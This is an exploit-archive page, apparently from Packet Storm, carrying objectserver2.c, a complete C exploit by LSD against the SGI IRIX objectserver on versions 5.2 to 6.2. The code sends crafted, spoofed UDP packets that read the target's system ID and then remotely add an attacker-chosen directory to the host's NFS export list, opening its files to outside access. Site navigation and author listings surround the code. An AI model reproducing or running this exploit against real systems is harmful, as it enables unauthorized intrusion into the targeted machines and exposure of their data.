objectserver2.c

objectserver2.c: Posted Sep 7, 2000; Site lsd-pl.net; SGI objectserver "export" exploit - Remotely adds new entry to the export list on the IRIX system. See our SGI objectserver "account" exploit for more information. Only directories that aren't supersets of already exported ones can be added to the export list.; tags | exploit; systems | irix; SHA-256 | 4b12bc670104362647c98bc09c33e31bd72cf0907624f171bded34b49558ac77; Download | Favorite | View

objectserver2.c

/*## copyright LAST STAGE OF DELIRIUM jul 1997 poland        *://lsd-pl.net/ #*/
/*## objectserver                                                            #*/

/*   SGI objectserver "export" exploit                                        */
/*   Remotely adds new entry to the export list on the IRIX system.           */
/*   See our SGI objectserver "account" exploit for more information.         */
/*   Only directories that aren't supersets of already exported ones          */
/*   can be added to the export list.                                         */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/uio.h>
#include <errno.h>
#include <stdio.h>
#define E if(errno) perror("");

struct iovec iov[2];
struct msghdr msg;
char buf1[1024],buf2[1024];
int sck;
unsigned long adr;

void show_msg(){
    char *p,*p1;
    int i,j,c,d;

    c=0;
    printf("%04x   ",iov[0].iov_len);
    p=(char*)iov[0].iov_base;
    for(i=0;i<iov[0].iov_len;i++){
        c++;
        if(c==17){
             printf("    ");
             p1=p;p1=p1-16;
             for(j=0;j<16;j++){
                 if(isprint(*p1)) printf("%c",*p1);
                 else printf(".");
                 p1++;
             }
             c=1;
             printf("\n       ");
        }
        printf("%02x ",(unsigned char)*p++);
    }
    printf("    ");
    p1=p;p1=p1-c;
    if(c>1){
        for(i=0;i<(16-c);i++) printf("   ");
        for(i=0;i<c;i++){
            if(isprint(*p1)) printf("%c",*p1);
            else printf(".");
            p1++;
        }
    }
    printf("\n");
    if(msg.msg_iovlen!=2) return;

    c=0;
    p=(char*)iov[0].iov_base;
    d=p[0x0a]*0x100+p[0x0b];
    p=(char*)iov[1].iov_base;
    printf("%04x   ",d);
    for(i=0;i<d;i++){
        c++;
        if(c==17){
             printf("    ");
             p1=p;p1=p1-16;
             for(j=0;j<16;j++){
                 if(isprint(*p1)) printf("%c",*p1);
                 else printf(".");
                 p1++;
             }
             c=1;
             printf("\n       ");
        }
        printf("%02x ",(unsigned char)*p++);
    }
    printf("    ");
    p1=p;p1=p1-c;
    if(c>1){
        for(i=0;i<(16-c);i++) printf("   ");
        for(i=0;i<c;i++){
            if(isprint(*p1)) printf("%c",*p1);
            else printf(".");
            p1++;
        }
    }
    printf("\n");
    fflush(stdout);
}

char numer_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};

char numer_two[0x24]={
    0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
    0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
    0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
    0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
    0x01,0x07,0x01,0x01
};

char dodaj_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};

char dodaj_two[1024]={
    0x1c,0x03,0x00,0x43,0x01,0x04,0x0a,0x01,
    0x01,0x3b,0x01,0x78
};

char dodaj_three[27]={
    0x01,0x02,0x0a,0x01,0x01,0x3b,0x01,
    0xd2,0x00,0x00,0x80,0x43,0x01,0x04,0x17,
    0x0b,0x01,0x01,0x3b,0x01,0x02,0x01,0x01,
    0x01,0x09,0x43,0x01
};

char dodaj_four[47]={
    0x17,0x0b,0x01,0x01,0x3b,0x01,0xd2,
    0x01,0x04,0x01,0x09,0x43,0x01,0x04,0x72,
    0x6f,0x6f,0x74,0x17,0x0b,0x01,0x01,0x3b,
    0x01,0xd2,0x01,0x08,0x01,0x07,0x01,0x01,
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x01,0x01,
    0x01,0x01,0x0f,0x02,0xff,0xff,0xff,0xff
};

char fake_adrs[0x10]={
    0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

char *get_sysinfo(){
    int i=0,j,len;

    iov[0].iov_base=numer_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=numer_two;
    iov[1].iov_len=0x24;
    msg.msg_name=(caddr_t)fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    msg.msg_accrights=(caddr_t)0;
    msg.msg_accrightslen=0;
    printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
    printf("\n");

    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
    printf("\n");
    while(i<len-0x16)
        if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
            printf("remote system ID: ");
            for(j=0;j<buf2[i+6];j++) printf("%02x ",(unsigned char)buf2[i+7+j]);
            printf("\n");
            return(&buf2[i+6]);
        }else i++;
    return(0);
}

void new_export(int len){
    iov[0].iov_base=dodaj_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=dodaj_two;
    iov[1].iov_len=len;
    msg.msg_name=(caddr_t)fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    msg.msg_accrights=(caddr_t)0;
    msg.msg_accrightslen=0;
    printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
    printf("\n");

    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
    printf("\n");
}

void info(char *text) {
    printf("usage: %s address directory\n",text);
}

main(int argc,char **argv){
    int probe=0;
    unsigned int offset;
    char *sys_info;

    printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/\n");
    printf("objectserver for irix 5.2 5.3 6.2\n\n");

    if(argc<2) {info(argv[0]);exit(0);}
    else if(argc==2) probe=1;
    offset=39;
    adr=inet_addr(argv[1]);

    sck=socket(AF_INET,SOCK_DGRAM,0);
    memcpy(&fake_adrs[4],&adr,4);
    memcpy(&dodaj_four[43],&adr,4);

    if(!(sys_info=get_sysinfo())){
        printf("error: can't get system ID for %s.\n",argv[1]);
        exit(1);
    }
    if(!probe){
        memcpy(&dodaj_two[0x0c],sys_info,sys_info[0]+1);
        memcpy(&dodaj_two[0x0c+sys_info[0]+1],&dodaj_three[0],27);

        offset+=sys_info[0]+1;
        dodaj_two[offset++]=strlen(argv[2]);

        memcpy(&dodaj_two[offset],argv[2],strlen(argv[2])); 
        offset+=strlen(argv[2]); 
        memcpy(&dodaj_two[offset],&dodaj_four[0],47);
        offset+=47;
        dodaj_one[10]=offset>>8;
        dodaj_one[11]=offset&0xff;
        new_export(offset);
    }else printf("error: no directory specified.\n"); 
}
/*                    www.hack.co.za           [12 August 2000]*/

Top Authors In Last 30 Days

Red Hat 202 files
indoushka 108 files
Ubuntu 82 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,789)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,546)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,754)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

objectserver2.c

objectserver2.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

objectserver2.c

Share This

objectserver2.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems